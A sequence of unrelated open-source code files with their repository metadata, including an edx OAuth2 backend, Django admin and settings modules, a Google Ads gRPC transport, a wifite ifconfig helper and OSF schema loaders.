additionals = u",".join(set(additionals))
data["additionals"] = additionals.encode("utf8")
if content_language:
content_language = content_language[:2].lower()
if not len(content_language) == 2:
raise ValueError(u"content_language")
headers.append(("Content-Language", content_language.encode("ascii")))
# Even if POST, it's idempotent as GET.
return self._parse_result(self._req("POST", url, data, headers))
def get_tags(self, source, input, url_hint=None, content_language=None):
url = u"%s/tags" % self._base_url
data = {}
headers = []
data["source"] = source.encode("utf8")
data["input"] = input.encode("utf8")
if url_hint:
if not _re_url.match(url_hint):
raise ValueError(u"url_hint")
data["url_hint"] = url_hint.encode("utf8")
if content_language:
content_language = content_language[:2].lower()
if not len(content_language) == 2:
raise ValueError(u"content_language")
headers.append(("Content-Language", content_language.encode("ascii")))
# Even if POST, it's idempotent as GET.
return self._parse_result(self._req("POST", url, data, headers))
|
bsd-3-clause
| 6,838,378,754,736,598,000
| 32.405405
| 101
| 0.587379
| false
| 3.624633
| false
| false
| false
|
proversity-org/edx-platform
|
lms/djangoapps/student_account/talenetic.py
|
1
|
7807
|
from six.moves.urllib_parse import urlencode, unquote
import jwt
import json
from django.conf import settings
from student.models import Registration, UserProfile
from social_core.backends.oauth import BaseOAuth2
from django.contrib.auth.models import User
import uuid
import logging
import social_django
log = logging.getLogger(__name__)
class TaleneticOAuth2(BaseOAuth2):
"""
Talenetic OAuth2 authentication backend
"""
settings_dict = settings.CUSTOM_BACKENDS.get('talenetic')
name = 'talenetic-oauth2'
REDIRECT_STATE = False
ID_KEY = 'emailaddress'
STATE_PARAMETER = False
AUTHORIZATION_URL = settings_dict.get('AUTH_URL')
ACCESS_TOKEN_URL = settings_dict.get('ACCESS_TOKEN_URL')
ACCESS_TOKEN_METHOD = 'GET'
REFRESH_TOKEN_URL = settings_dict.get('REFRESH_TOKEN_URL')
REFRESH_TOKEN_METHOD = 'POST'
RESPONSE_TYPE = 'code jwt_token'
REDIRECT_IS_HTTPS = False
REVOKE_TOKEN_URL = settings_dict.get('LOGOUT_URL')
REVOKE_TOKEN_METHOD = 'POST'
def get_scope_argument(self):
return {}
def auth_complete(self, *args, **kwargs):
"""Completes login process, must return user instance"""
self.process_error(self.data)
state = self.validate_state()
access_url = "{}?uid={}".format(self.access_token_url(), self._get_uid())
response = self.request_access_token(
access_url,
data=self._get_creds(),
headers=self._get_creds(),
auth=self.auth_complete_credentials(),
method=self.ACCESS_TOKEN_METHOD
)
self.process_error(response)
return self.do_auth(response['jwt_token'], response=response,
*args, **kwargs)
def do_auth(self, jwt_token, *args, **kwargs):
data = self.user_data(jwt_token, *args, **kwargs)
response = kwargs.get('response') or {}
response.update(data or {})
if 'access_token' not in response:
response['access_token'] = jwt_token
kwargs.update({'response': response, 'backend': self})
return self.strategy.authenticate(*args, **kwargs)
def _get_uid(self):
if 'uid' in self.data:
return self.data['uid']
else:
return None
def auth_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
uri = self.get_redirect_uri(state)
if self.REDIRECT_IS_HTTPS:
uri = uri.replace('http://', 'https://')
params = {
'urlredirect': uri,
'clientId': client_id,
'secretkey': client_secret
}
return params
def get_user_id(self, details, response):
return details.get('email')
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
return self.get_user_details(kwargs.get('response'))
def get_user_details(self, response):
response = self._fill_fields(response)
self._set_uid_to_profile(self._get_uid(), response.get('emailaddress'))
return {'username': response.get('username'),
'email': response.get('emailaddress'),
'fullname': response.get('firstname'),
'first_name': response.get('firstname')}
def _fill_fields(self, data):
# a little util to fill in missing data for later consumption
if data.get('firstname') is None:
data['firstname'] = data.get('emailaddress').split('@')[0]
if data.get('username') is None:
data['username'] = data.get('emailaddress').split('@')[0]
return data
def _get_creds(self):
client_id, client_secret = self.get_key_and_secret()
return {
'secretkey': client_secret,
'clientId': client_id
}
def auth_headers(self):
return {'Accept': 'application/json'}
def pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
"""
This is a special override of the pipeline method.
It grabs the user from the pipeline run and adds the incoming
uid as a field on the user profile's meta field.
"""
# Some usernames coming in from the SSO contain a full stop, so the
# user cannot be found and OAuth tries to create a new one, which
# breaks because the email already exists. Forcefully set the user
# here, if it exists, so the rest of the OAuth flow works properly.
if kwargs.get('user') is None:
try:
user = User.objects.get(email=kwargs.get('response').get('emailaddress'))
kwargs['user'] = user
except User.DoesNotExist:
pass
out = self.run_pipeline(pipeline, pipeline_index, *args, **kwargs)
if not isinstance(out, dict):
return out
user = out.get('user')
if user:
user.social_user = out.get('social')
user.is_new = out.get('is_new')
return user
def _set_uid_to_profile(self, uid, emailaddress):
"""
This function looks up the existing user by email address;
if the user is found, the requested uid is saved to the user profile,
because it is needed at logout.
"""
try:
user = User.objects.get(email=emailaddress)
user_profile = user.profile
new_meta = {'talenetic-uid': uid}
if len(user_profile.meta) > 0:
previous_meta = json.loads(user_profile.meta)
mixed_dicts =\
(previous_meta.items() + new_meta.items())
new_meta =\
{key: value for (key, value) in mixed_dicts}
user_profile.meta = json.dumps(new_meta)
user_profile.save()
except Exception as e:
log.error("Could not save uid to user profile or something else: {}".format(e.message))
def auth_url(self):
"""Return redirect url"""
params = self.auth_params()
params = urlencode(params)
if not self.REDIRECT_STATE:
# redirect_uri matching is strictly enforced, so match the
# providers value exactly.
params = unquote(params)
return '{0}?{1}'.format(self.authorization_url(), params)
def revoke_token_url(self, token, uid):
social_user = social_django.models.DjangoStorage.user.get_social_auth(provider=self.name, uid=uid)
profile = social_user.user.profile
meta_data = json.loads(profile.meta)
url = "{}?uid={}".format(self.REVOKE_TOKEN_URL, meta_data.get('talenetic-uid'))
return url
def revoke_token_params(self, token, uid):
return {}
def revoke_token_headers(self, token, uid):
return self._get_creds()
def process_revoke_token_response(self, response):
return response.status_code == 200
def revoke_token(self, token, uid):
if self.REVOKE_TOKEN_URL:
url = self.revoke_token_url(token, uid)
params = self.revoke_token_params(token, uid)
headers = self.revoke_token_headers(token, uid)
data = urlencode(params) if self.REVOKE_TOKEN_METHOD != 'GET' \
else None
response = self.request(url, params=params, headers=headers,
data=data, method=self.REVOKE_TOKEN_METHOD)
return self.process_revoke_token_response(response)
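# Configuration sketch (illustrative): the backend reads these keys from
# settings.CUSTOM_BACKENDS['talenetic'] above; the URLs are placeholders.
#
#   CUSTOM_BACKENDS = {
#       'talenetic': {
#           'AUTH_URL': 'https://sso.example.com/authorize',
#           'ACCESS_TOKEN_URL': 'https://sso.example.com/token',
#           'REFRESH_TOKEN_URL': 'https://sso.example.com/refresh',
#           'LOGOUT_URL': 'https://sso.example.com/logout',
#       },
#   }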
|
agpl-3.0
| 211,726,550,094,709,500
| 33.166667
| 106
| 0.575893
| false
| 4.096013
| false
| false
| false
|
denis-guillemenot/pmi_collect
|
simpleHTTPServer.py
|
1
|
1587
|
# ----------------------------------------------------------------
# name : simpleHTTPServer.py
# object: Simple MultiThreaded Web Server
# usage: python SimpleHTTPServer [port] / default port: 8080
# author: denis_guillemenot@fr.ibm.com / denis.guillemenot@gmail.com
# date : 19/09/2013
# ----------------------------------------------------------------
import sys
# Use default or provided port
print
if len(sys.argv) > 1:
msg = "provided"
try:
cause = "must be an integer"
port = int(sys.argv[1])
if port < 1024:
cause = "must be >= 1024"
raise ValueError(cause)
except:
print "ERROR: %s port:%s %s... exiting" % (msg, sys.argv[1], cause)
sys.exit(1)
else:
msg = "default"
port = 8080
print "Using %s port:%d" % ( msg, port)
import SocketServer, BaseHTTPServer, sys, os, CGIHTTPServer, os, os.path
# port = 8080
class ThreadingCGIServer( SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
# set os separator
try:
os_sep = os.path.os.sep
False = 0
True = 1
except:
try:
os_sep = os.path.sep
except:
print("ERROR: can not set os.separator, exiting...")
sys.exit(-1)
# set rootdir
currdir = os.getcwd()
# rootdir = currdir + os_sep + 'data'
# if ( os.path.exists( rootdir)): os.chdir( rootdir)
# start HTTP Server
server = ThreadingCGIServer( ('', port), CGIHTTPServer.CGIHTTPRequestHandler)
print "Server started on port %s." % port
try:
while 1:
sys.stdout.flush()
server.handle_request()
except KeyboardInterrupt:
if ( os.path.exists( currdir)): os.chdir( currdir)
print "Server stopped."
|
mit
| 3,394,831,740,184,228,400
| 24.190476
| 82
| 0.608066
| false
| 3.348101
| false
| false
| false
|
sylvainnizac/Djangoctopus
|
blog/admin.py
|
1
|
2774
|
# -*- coding: utf8 -*-
from django.contrib import admin
from blog.models import Categorie, Article, Comment
class ArticleAdmin(admin.ModelAdmin):
list_display = ('titre', 'auteur', 'date', 'categorie', 'apercu_contenu')
list_filter = ('auteur','categorie',)
date_hierarchy = 'date'
ordering = ('-date', )
search_fields = ('titre', 'contenu')
prepopulated_fields = {"slug": ("titre",)}
# Edit form configuration
fieldsets = (
# Fieldset 1: meta info (title, author...)
('Général',
{'fields': ('titre', 'slug', 'auteur', 'categorie')
}),
# Fieldset 2: article content
('Contenu de l\'article',
{ 'description': 'Le formulaire accepte les balises HTML. Utilisez-les à bon escient !',
'fields': ('contenu', )
}),
)
def apercu_contenu(self, article):
"""
Return the first 40 characters of the article content. If the
content is longer than 40 characters, an ellipsis is appended.
"""
text = article.contenu[0:40]
if len(article.contenu) > 40:
return '%s...' % text
else:
return text
# Header of our column
apercu_contenu.short_description = 'Aperçu du contenu'
class CommentsAdmin(admin.ModelAdmin):
list_display = ('pseudo', 'email', 'article', 'apercu_description', 'date', 'commentaire_visible')
list_filter = ('pseudo', 'article', 'email', )
date_hierarchy = 'date'
ordering = ('-date', )
search_fields = ('pseudo', 'email', 'article', )
# Edit form configuration
fieldsets = (
# Fieldset 1: meta info (title, author...)
('Général',
{'fields': ('pseudo', 'email'), }),
# Fieldset 2: comment content
('Commentaire',
{ 'description': 'Le formulaire n\'accepte pas les balises HTML.',
'fields': ('description', )}),
# Fieldset 3: moderation
('Modération',
{ 'fields': ('commentaire_visible', )}),
)
def apercu_description(self, commentaire):
"""
Return the first 40 characters of the comment content. If the
content is longer than 40 characters, an ellipsis is appended.
"""
text = commentaire.description[0:40]
if len(commentaire.description) > 40:
return '%s...' % text
else:
return text
# Header of our column
apercu_description.short_description = 'Aperçu du commentaire'
# Register your models here.
admin.site.register(Categorie)
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment, CommentsAdmin)
|
gpl-2.0
| -2,033,523,279,121,713,400
| 33.848101
| 104
| 0.587722
| false
| 3.407178
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/services/media_file_service/transports/grpc.py
|
1
|
11285
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v6.resources.types import media_file
from google.ads.googleads.v6.services.types import media_file_service
from .base import MediaFileServiceTransport, DEFAULT_CLIENT_INFO
class MediaFileServiceGrpcTransport(MediaFileServiceTransport):
"""gRPC backend transport for MediaFileService.
Service to manage media files.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(self, *,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn("api_mtls_endpoint and client_cert_source are deprecated", DeprecationWarning)
host = api_mtls_endpoint if ":" in api_mtls_endpoint else api_mtls_endpoint + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host,
credentials=credentials,
client_info=client_info,
)
@classmethod
def create_channel(cls,
host: str = 'googleads.googleapis.com',
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs
)
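# A hedged usage sketch (not part of the generated transport; the endpoint
# below is the class default, the rest is illustrative only):
#
#   channel = MediaFileServiceGrpcTransport.create_channel(
#       'googleads.googleapis.com',
#       scopes=MediaFileServiceGrpcTransport.AUTH_SCOPES,
#   )
#   transport = MediaFileServiceGrpcTransport(channel=channel)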
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_media_file(self) -> Callable[
[media_file_service.GetMediaFileRequest],
media_file.MediaFile]:
r"""Return a callable for the get media file method over gRPC.
Returns the requested media file in full detail.
Returns:
Callable[[~.GetMediaFileRequest],
~.MediaFile]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_media_file' not in self._stubs:
self._stubs['get_media_file'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v6.services.MediaFileService/GetMediaFile',
request_serializer=media_file_service.GetMediaFileRequest.serialize,
response_deserializer=media_file.MediaFile.deserialize,
)
return self._stubs['get_media_file']
@property
def mutate_media_files(self) -> Callable[
[media_file_service.MutateMediaFilesRequest],
media_file_service.MutateMediaFilesResponse]:
r"""Return a callable for the mutate media files method over gRPC.
Creates media files. Operation statuses are returned.
Returns:
Callable[[~.MutateMediaFilesRequest],
~.MutateMediaFilesResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'mutate_media_files' not in self._stubs:
self._stubs['mutate_media_files'] = self.grpc_channel.unary_unary(
'/google.ads.googleads.v6.services.MediaFileService/MutateMediaFiles',
request_serializer=media_file_service.MutateMediaFilesRequest.serialize,
response_deserializer=media_file_service.MutateMediaFilesResponse.deserialize,
)
return self._stubs['mutate_media_files']
__all__ = (
'MediaFileServiceGrpcTransport',
)
|
apache-2.0
| -4,525,491,664,470,927,400
| 43.254902
| 112
| 0.608773
| false
| 4.725712
| false
| false
| false
|
derv82/wifite2
|
wifite/tools/ifconfig.py
|
1
|
1784
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
from .dependency import Dependency
class Ifconfig(Dependency):
dependency_required = True
dependency_name = 'ifconfig'
dependency_url = 'apt-get install net-tools'
@classmethod
def up(cls, interface, args=[]):
'''Put interface up'''
from ..util.process import Process
command = ['ifconfig', interface]
if isinstance(args, list):
command.extend(args)
elif isinstance(args, str):
command.append(args)
command.append('up')
pid = Process(command)
pid.wait()
if pid.poll() != 0:
raise Exception('Error putting interface %s up:\n%s\n%s' % (interface, pid.stdout(), pid.stderr()))
@classmethod
def down(cls, interface):
'''Put interface down'''
from ..util.process import Process
pid = Process(['ifconfig', interface, 'down'])
pid.wait()
if pid.poll() != 0:
raise Exception('Error putting interface %s down:\n%s\n%s' % (interface, pid.stdout(), pid.stderr()))
@classmethod
def get_mac(cls, interface):
from ..util.process import Process
output = Process(['ifconfig', interface]).stdout()
# Mac address separated by dashes
mac_dash_regex = ('[a-zA-Z0-9]{2}-' * 6)[:-1]
match = re.search(' ({})'.format(mac_dash_regex), output)
if match:
return match.group(1).replace('-', ':')
# Mac address separated by colons
mac_colon_regex = ('[a-zA-Z0-9]{2}:' * 6)[:-1]
match = re.search(' ({})'.format(mac_colon_regex), output)
if match:
return match.group(1)
raise Exception('Could not find the mac address for %s' % interface)
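# A hedged usage sketch (the interface name 'wlan0' is an assumption; any
# failure raises the exceptions above):
#
#   Ifconfig.down('wlan0')
#   Ifconfig.up('wlan0')
#   print(Ifconfig.get_mac('wlan0'))   # e.g. 'aa:bb:cc:dd:ee:ff'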
|
gpl-2.0
| 4,402,937,286,454,165,000
| 28.245902
| 113
| 0.568946
| false
| 3.90372
| false
| false
| false
|
HalcyonChimera/osf.io
|
website/project/metadata/schemas.py
|
1
|
2265
|
import os
import json
LATEST_SCHEMA_VERSION = 2
def _id_to_name(id):
return ' '.join(id.split('_'))
def _name_to_id(name):
return '_'.join(name.split(' '))
def ensure_schema_structure(schema):
schema['pages'] = schema.get('pages', [])
schema['title'] = schema['name']
schema['version'] = schema.get('version', 1)
schema['active'] = schema.get('active', True)
return schema
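# A minimal sketch of the normalisation above (input dict is invented, not a
# real OSF schema): missing keys are backfilled and 'title' mirrors 'name'.
#
#   ensure_schema_structure({'name': 'Example Schema'})
#   # -> {'name': 'Example Schema', 'pages': [], 'title': 'Example Schema',
#   #     'version': 1, 'active': True}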
here = os.path.split(os.path.abspath(__file__))[0]
def from_json(fname):
with open(os.path.join(here, fname)) as f:
return json.load(f)
OSF_META_SCHEMAS = [
ensure_schema_structure(from_json('osf-open-ended-1.json')),
ensure_schema_structure(from_json('osf-open-ended-2.json')),
ensure_schema_structure(from_json('osf-standard-1.json')),
ensure_schema_structure(from_json('osf-standard-2.json')),
ensure_schema_structure(from_json('brandt-prereg-1.json')),
ensure_schema_structure(from_json('brandt-prereg-2.json')),
ensure_schema_structure(from_json('brandt-postcomp-1.json')),
ensure_schema_structure(from_json('brandt-postcomp-2.json')),
ensure_schema_structure(from_json('prereg-prize.json')),
ensure_schema_structure(from_json('erpc-prize.json')),
ensure_schema_structure(from_json('confirmatory-general-2.json')),
ensure_schema_structure(from_json('egap-project-2.json')),
ensure_schema_structure(from_json('veer-1.json')),
ensure_schema_structure(from_json('aspredicted.json')),
ensure_schema_structure(from_json('registered-report.json')),
ensure_schema_structure(from_json('ridie-initiation.json')),
ensure_schema_structure(from_json('ridie-complete.json')),
]
METASCHEMA_ORDERING = (
'Prereg Challenge',
'Open-Ended Registration',
'Preregistration Template from AsPredicted.org',
'Registered Report Protocol Preregistration',
'OSF-Standard Pre-Data Collection Registration',
'Replication Recipe (Brandt et al., 2013): Pre-Registration',
'Replication Recipe (Brandt et al., 2013): Post-Completion',
"Pre-Registration in Social Psychology (van 't Veer & Giner-Sorolla, 2016): Pre-Registration",
'Election Research Preacceptance Competition',
'RIDIE Registration - Study Initiation',
'RIDIE Registration - Study Complete',
)
|
apache-2.0
| 8,412,698,295,121,021,000
| 38.736842
| 98
| 0.696247
| false
| 3.296943
| false
| false
| false
|
ashbc/tgrsite
|
tgrsite/settings.py
|
1
|
6161
|
"""
Django settings for tgrsite project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import django.contrib.messages.constants as message_constants
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from django.urls import reverse_lazy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ADMINS = [('Webadmin', 'webadmin@warwicktabletop.co.uk')]
MANAGERS = [('Webadmin', 'webadmin@warwicktabletop.co.uk')]
LOGIN_URL = '/login/'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'localhost')
EMAIL_PORT = os.environ.get('EMAIL_PORT', 587)
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', '')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = os.environ.get('FROM_EMAIL', 'webmaster@localhost')
s = ''
try:
from .keys import secret
s = secret()
except:
# this will throw a KeyError and crash if neither are specified
# which is a decent enough way of enforcing it
s = os.environ['SECRET_KEY']
SECRET_KEY = s
# Defaults off unless explicitly stated in environment variable
try:
if os.environ['DEBUG'].lower() == 'true':
DEBUG = True
else:
DEBUG = False
except KeyError:
DEBUG = False
# needs 127 to work on my machine...
ALLOWED_HOSTS = [os.environ.get('HOST', 'localhost'), '127.0.0.1']
PRIMARY_HOST = '127.0.0.1:8000'
if DEBUG:
from .ipnetworks import IpNetworks
INTERNAL_IPS = IpNetworks(['127.0.0.1', '192.168.0.0/255.255.0.0'])
else:
INTERNAL_IPS = ['127.0.0.1']
INSTALLED_APPS = [
'website_settings',
'navbar',
'assets',
'minutes',
'inventory',
'forum',
'users',
'rpgs',
'exec',
'templatetags',
'timetable',
'messaging',
'gallery',
'pages',
'newsletters',
'notifications',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'redirect'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tgrsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'tgrsite/templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'tgrsite.context_processors.latestposts',
'tgrsite.context_processors.mergednavbar'
],
},
},
]
WSGI_APPLICATION = 'tgrsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTHENTICATION_BACKENDS = [
'users.backends.CaseInsensitiveModelBackend',
# 'django.contrib.auth.backends.ModelBackend',
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-gb'
USE_I18N = True
USE_L10N = True
# Europe/London means GMT+0 with a DST offset of +1:00 i.e. England time
TIME_ZONE = 'Europe/London'
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
# site URL that static files are served from
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = reverse_lazy("homepage")
# directories to collect static files from
STATICFILES_DIRS = [
# where the static files are stored in the repo and collected from
os.path.join(BASE_DIR, 'static_resources'),
]
# directory the static files are served from
STATIC_ROOT = os.path.join(BASE_DIR, 'STATIC')
# directories for the uploaded files
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'MEDIA')
# Monday
FIRST_DAY_OF_WEEK = 1
# Set up Crispy to render forms bootstrap4-ish
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# as advised by python manage.py check --deploy
# prevent browsers from MIME type sniffing. doesn't play nice
# SECURE_CONTENT_TYPE_NOSNIFF=True
# enable browsers' XSS filters
SECURE_BROWSER_XSS_FILTER = True
# ensure all traffic is SSL (https)
SECURE_SSL_REDIRECT = not DEBUG
# session cookies secure-only
SESSION_COOKIE_SECURE = not DEBUG
# same for CSRF cookie
CSRF_COOKIE_SECURE = not DEBUG
# CSRF_COOKIE_HTTPONLY=True
X_FRAME_OPTIONS = 'DENY'
MESSAGE_TAGS = {
message_constants.DEBUG: 'alert-dark',
message_constants.INFO: 'alert-primary',
message_constants.SUCCESS: 'alert-success',
message_constants.WARNING: 'alert-warning',
message_constants.ERROR: 'alert-danger',
}
# Allow local configuration (change deploy options etc.)
try:
from .local_config import *
except ImportError:
pass
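# A hypothetical local_config.py (the file name matches the import above; the
# contents are assumptions) that a deployment might drop next to this module:
#
#   DEBUG = True
#   ALLOWED_HOSTS = ['staging.example.org']
#   EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'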
|
isc
| -7,394,605,813,598,171,000
| 26.382222
| 91
| 0.687226
| false
| 3.42468
| false
| false
| false
|
Guts/isogeo-api-py-minsdk
|
isogeo_pysdk/models/metadata.py
|
1
|
38320
|
# -*- coding: UTF-8 -*-
#! python3
"""
Isogeo API v1 - Model of Metadata (= Resource) entity
See: http://help.isogeo.com/api/complete/index.html#definition-resource
"""
# #############################################################################
# ########## Libraries #############
# ##################################
# standard library
import logging
import pprint
import re
import unicodedata
# package
from isogeo_pysdk.enums import MetadataSubresources, MetadataTypes
# others models
from isogeo_pysdk.models import Workgroup
# #############################################################################
# ########## Globals ###############
# ##################################
logger = logging.getLogger(__name__)
# for slugified title
_regex_slugify_strip = re.compile(r"[^\w\s-]")
_regex_slugify_hyphenate = re.compile(r"[-\s]+")
# #############################################################################
# ########## Classes ###############
# ##################################
class Metadata(object):
"""Metadata are the main entities in Isogeo.
:Example:
.. code-block:: json
{
"_abilities": [
"string"
],
"_created": "string (date-time)",
"_creator": {
"_abilities": [
"string"
],
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"areKeywordsRestricted": "boolean",
"canCreateMetadata": "boolean",
"code": "string",
"contact": {
"_created": "string (date-time)",
"_id": "string (uuid)",
"_modified": "string (date-time)",
"addressLine1": "string",
"addressLine2": "string",
"addressLine3": "string",
"available": "string",
"city": "string",
"count": "integer (int32)",
"countryCode": "string",
"email": "string",
"fax": "string",
"hash": "string",
"name": "string",
"organization": "string",
"phone": "string",
"type": "string",
"zipCode": "string"
},
"keywordsCasing": "string",
"metadataLanguage": "string",
"themeColor": "string"
},
"_id": "string (uuid)",
"_modified": "string (date-time)",
"abstract": "string",
"bbox": [
"number (double)"
],
"collectionContext": "string",
"collectionMethod": "string",
"conditions": [
{
